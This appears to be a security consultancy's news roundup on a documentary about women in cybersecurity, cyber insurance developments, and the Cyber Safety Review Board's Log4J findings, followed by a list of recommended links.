Curated advice, guidance, learning and trends in cybersecurity and privacy, as chosen by our consultants.
Documentary aims to focus on women’s achievements in security
A new documentary aims to shine a spotlight on female achievements in the cybersecurity field. Titled ‘Women in Security’, it will use storytelling techniques and interviews with respected industry professionals and experts. We’re proud to announce that BH Consulting’s Chief Operations Officer, Dr. Valerie Lyons, is one of the film’s 26 contributors. (In a busy month, Valerie has also been chosen by the European Data Protection Board as one of its support pool of experts.)
The filmmakers hope to inspire the next generation of young women to pursue a career in security – a field that’s historically been a male-dominated profession. The documentary aims to celebrate the achievements of women in cybersecurity, to empower women already working in the field, to accelerate closing of the gender gap and, in the process, address the industry’s labour shortage. The film is currently in production, with an anticipated release date of March 2023. There’s more information at the documentary’s LinkedIn page.
Meanwhile, for those interested in privacy and data protection, there’s an excellent post about getting a career in that field. Emerald de Leeuw, a longstanding privacy specialist, has written the first in a planned series. In her first post, she outlines how to get started in the field, whether you need to be a lawyer, and what it’s like to work as a privacy consultant.
As demand for cyber risk insurance increases, two recent developments could have policyholders scrambling to check their cover. In the United States, a judge dismissed a claim against an insurance company that refused to pay extra for losses due to business email compromise. The company sought $600,000 to cover its losses but its social engineering fraud policy had a cap of $100,000. In effect, the judge ruled that social engineering and computer fraud were not the same, and dismissed the suit. Independent research like the Verizon Data Breach Investigations Report consistently shows high numbers of breaches involving a human element. If other judges follow this precedent, insurance companies could become less likely to pay in cases like this.
Meanwhile, Lloyd’s of London is to exclude some nation-state cyberattacks from insurance policies, from March next year. Cybersecurity Dive said the move had been expected for some time. Dark Reading said it should prompt businesses to reevaluate their cyber risk policies. Brian Honan hoped this could lead to “more honest press releases and breach notifications where companies won’t automatically leap to point the blame at ‘nation state sophisticated attackers’, but rather admit they were victims of ordinary criminal behaviour.” And the cyber insurance market keeps growing. Fitch Ratings estimates annual cyber risk premiums are between $8-10 billion today. By 2025, it expects them to grow to more than $22 billion.
The Log4J ‘gift’ will keep giving
Cast your mind back to December of last year: for anyone working in information security, the discovery of the Log4J flaw affected Apache’s Log4J library in hundreds of millions of devices. It had the potential to enable attacks including system compromise, data theft, or ransomware infections. Its scope quickly earned it the title of “the most significant vulnerability in the last decade”. Now the next ten years isn’t looking too promising. The Cyber Safety Review Board, set up earlier this year by President Joe Biden, found that Log4J risks are endemic and will persist for a decade.
The board’s 52-page report goes back over the event in detail. It also includes recommendations to help mitigate the risks. As Brian Honan noted, this follows an established pattern in security. “As we are still having breaches due to SQL injection and other vulnerabilities identified decades ago, I have no doubt that we will still be dealing with recently discovered vulnerabilities for decades to come, and yes I won’t be surprised to still see SQL injection attacks over the coming decades. Security engineering needs to become the default for all systems and applications from their very beginning and not something added on as a nice to have or to keep regulators happy.”
Links we liked
LastPass’ disclosure of a security incident is a case study on clarity and transparency. MORE
For your incident response planning: questions that always get asked in a crisis. MORE
Ireland’s NCSC has published guidance on securing operational technology. MORE
Lessons learned from real-life incident information sharing. MORE
An experiment found that a ‘checklist’ approach to security isn’t effective. MORE
US-centric but still useful: four myths inhibiting the search for cybersecurity talent. MORE
The Federal Trade Commission is sceptical of apps that claim to anonymise data. MORE
Researchers uncloak infrastructure used by ransomware groups. MORE
Seven open-source malware analysis tools for you to try. MORE
Overcoming obstacles to passwordless authentication. MORE
Have you signed up to our monthly newsletter? Every month we send out the latest cybersecurity and data protection news, trends and advice from around the globe. Sign up here